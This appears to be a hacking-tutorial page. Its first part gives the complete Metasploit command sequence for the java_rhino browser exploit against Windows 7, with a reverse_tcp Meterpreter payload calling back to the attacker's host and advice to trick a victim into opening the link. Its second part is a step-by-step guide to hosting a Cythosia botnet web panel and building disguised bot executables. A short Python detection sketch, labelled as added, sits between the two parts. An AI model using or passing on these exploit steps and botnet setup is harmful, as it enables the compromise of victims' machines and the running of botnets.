Backtrack java rhino exploit

Browser Java Rhino exploit Tutorial


We are going to pwn Windows 7 with a Java exploit called the Java Rhino exploit. Here I quote from the Armitage console's description of the exploit: "This module exploits a vulnerability in the Rhino Script Engine that can be used by Java Applet to run an arbitrary code outside of the sandbox". The vulnerability affects Java version 7 and earlier versions, and should work on any browser: Firefox, Safari, Internet Explorer, Google Chrome, etc.
First of all, update the Metasploit SVN checkout with the command #msfupdate, to make sure that the above exploit is included in your BackTrack exploit database. Then run:

#msfconsole

Then use this exploit:


#use exploit/multi/browser/java_rhino


Next set payload:


#set payload java/meterpreter/reverse_tcp





At this point, type the following commands. The first one sets the address of the server:


#set srvhost 192.168.1.6

In this case, 192.168.1.6 is my internal IP; you have to replace this value with your own IP. If you don't know your IP address, just open a terminal and type: #ifconfig. The next command defines the port of the server, which is usually port 80.


#set srvport 80

The next command sets the URI path of the exploit:


#set uripath java_rhino

#set lhost 192.168.1.6


#set lport 443





Notice also that srvhost and lhost have the same IP address. Finally, type this command and wait for a connection:



#exploit







A link has been generated: Local IP: http://192.168.1.6:80/java_rhino. Copy the link and send it to your victim. Once you succeed in "social engineering" the link to a victim, the sending stage starts, and you'll have a Java Meterpreter session.






A Meterpreter session will be created.
That's it, Windows 7 is pwned =)
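
Seen from the network, the session above has a recognizable shape: a client fetches content with a Java runtime User-Agent from a host, then opens a connection to that same host on a different port (the post notes that srvhost and lhost share one IP). The detection sketch below is an added example, not part of the original post; the log format, the field names, the "Java/" User-Agent match and the 60-second window are assumptions, and the sample records are constructed.

```python
import re
from datetime import datetime, timedelta

# Constructed sample records; assumed format: <time> <kind> <client> <server>:<port> <detail>
SAMPLE_LOG = """\
2012-01-10T10:00:01 http 192.168.1.20 192.168.1.6:80 GET /java_rhino/ UA="Mozilla/5.0 (Windows NT 6.1) Firefox/9.0"
2012-01-10T10:00:03 http 192.168.1.20 192.168.1.6:80 GET /java_rhino/x.jar UA="Mozilla/4.0 (Windows 7 6.1) Java/1.6.0_26"
2012-01-10T10:00:05 conn 192.168.1.20 192.168.1.6:443 tcp-out
2012-01-10T10:01:00 http 192.168.1.21 192.168.1.9:80 GET /app/tool.jar UA="Java/1.6.0_26"
2012-01-10T10:30:00 conn 192.168.1.21 192.168.1.9:8443 tcp-out
2012-01-10T10:02:00 conn 192.168.1.22 192.168.1.6:443 tcp-out
"""

LINE_RE = re.compile(
    r'^(?P<ts>\S+) (?P<kind>http|conn) (?P<client>\S+) '
    r'(?P<server>[^:\s]+):(?P<port>\d+) (?P<detail>.*)$')
JAVA_UA_RE = re.compile(r'UA="[^"]*\bJava/\d')  # assumed JVM User-Agent marker
WINDOW = timedelta(seconds=60)                  # assumed correlation window


def parse(log_text):
    """Yield (time, kind, client, server, port, detail); skip malformed lines."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield (datetime.fromisoformat(m["ts"]), m["kind"], m["client"],
                   m["server"], int(m["port"]), m["detail"])


def find_callbacks(log_text, window=WINDOW):
    """Flag clients that fetch with a Java UA, then dial the same host on another port."""
    last_fetch = {}  # (client, server) -> (time, port) of the latest Java-UA fetch
    alerts = []
    for ts, kind, client, server, port, detail in sorted(parse(log_text)):
        key = (client, server)
        if kind == "http" and JAVA_UA_RE.search(detail):
            last_fetch[key] = (ts, port)
        elif kind == "conn" and key in last_fetch:
            fetch_ts, fetch_port = last_fetch[key]
            if port != fetch_port and ts - fetch_ts <= window:
                alerts.append({"client": client, "server": server, "callback_port": port,
                               "delay_s": int((ts - fetch_ts).total_seconds())})
    return alerts


if __name__ == "__main__":
    for alert in find_callbacks(SAMPLE_LOG):
        print("ALERT", alert)
```

Only the first client is flagged: the second Java fetch is followed by a connection well outside the window, and the third client never fetched anything with a Java User-Agent.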


Setup cythosia Bot

Tutorial to install cythosia Bot



Requirements:
- Cythosia bot,
- A web host on http://www.000webhost.com/ or any other web host but this one is for free.


First Step:
Log in to your web host account, or register, and get into your web host. The website takes you to a page where you have: "List of your domains."
Click on "go to cPanel" for the domain you've just made.


Second Step:
Scroll down the new page that opens and click on "File Manager" in the "Files" section.
Note: If the site asks for a login, enter the password of your account.
When the new page opens, open the folder called "public_html".
There, click the upload button.
You'll be redirected to a page that shows:
Files
Files entered here will be transferred to the FTP server.
And
Archives (zip, tar, tgz, gz)
Archives entered here will be decompressed, and the files inside will be transferred to the FTP server.
- Under the archives section, click "Choose File" and choose the "webPanel" zip archive that came out when you extracted the downloaded one. After that, click the "Check" above "Upload to directory" and wait a few seconds.


Third Step:
Return back to the first page of the File manager.
Now, to configure the files you've just uploaded so the bot can work, enter the webpanel folder on your web host, select all the files in it and click on Chmod. You get redirected to "Chmod directories and files"; there, change the Chmod value of the files to 777 and click the check mark button.


Fourth Step:
Now you can exit the window you are in and return to the members area: "cPanel". There, scroll down until you see "» Software / Services"; inside that section, click the one named "MySQL".
Create a new database with the username, database name and password you want, but remember them or save them somewhere.


Fifth Step:
Return to the cPanel and click "phpMyAdmin" in the same section as the MySQL one. Press "Enter phpMyAdmin" for the database you've just created. A new window will open; in it, click Import. The file to choose is the one named dump, which is located in the Webpanel folder that you extracted at the beginning. Select it and press "GO". After doing that, you can close that window.


Sixth Step:
Go back to the cPanel and press File Manager again. Navigate to:
/public_html/Botnet/Webpanel/admin/inc
Edit the config.php file with the details of the MySQL database, username and password you've just created.
Finally, save the file and exit the window.


Seventh Step:
Enter the domain of your web host. You'll be asked for a password; type in "admin".


*Creating a bot:
To create your bot, just open "CythBuilder" and change the "Domain" field to your domain. After that you can change "1.0.6 [beta] [23-03-2011]" to a name of your choice, and "Drop Name.exe" to the file name you want to appear.

Extract the file you just downloaded to your desktop.





